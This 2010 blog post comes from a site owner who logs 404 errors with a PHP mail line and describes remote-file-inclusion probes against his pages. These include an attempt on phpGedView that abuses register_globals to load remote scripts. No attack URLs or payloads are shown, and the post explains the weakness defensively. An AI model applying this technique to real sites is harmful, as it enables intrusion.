Thursday, February 4, 2010

Examples of ongoing web site injection attacks I am experiencing

I'm no security professional. When it comes to security, my eyes glaze over and I feel lost. But to get a better feel for the broken links at my sites, I recently edited my .htaccess file to include this line:

ErrorDocument 404 /404.php

Then I put this line into my 404.php:

mail('',"$_SERVER[REQUEST_URI] file not found at","Referred by: $_SERVER[HTTP_REFERER]\nREMOTE_ADDR: $_SERVER[REMOTE_ADDR]");

What followed from there was a startling procession of mails showing me repeated waves of php injection and hijacking attacks. I intend to log interesting samples here:

2010 February 4

This is apparently a random url sent in the hope that I may have a main.php file that will accept this remote page to display and do more mischief. I wager this is a signature vulnerability of some popular web software package.

I do have phpGedView installed at my site. This is apparently an attempt to take advantage of the php setting register_globals=on to set the phpGedView internal base directory variable to a remote site, then do some sort of command line and file mischief with php scripts at that remote site. This is probably a known vulnerability with some phpGedView set-ups. register_globals has long been recommended to be off, not on, due to this type of vulnerability. register_globals being on lets HTML GET and POST variables be registered as regular php global variables, which obviously can wreak havoc with the workings of your scripts. See wikibooks for a better explanation.

2010 February 11

This one is guessing I have an errors.php file that will do something fun with the url they are providing.

No comments: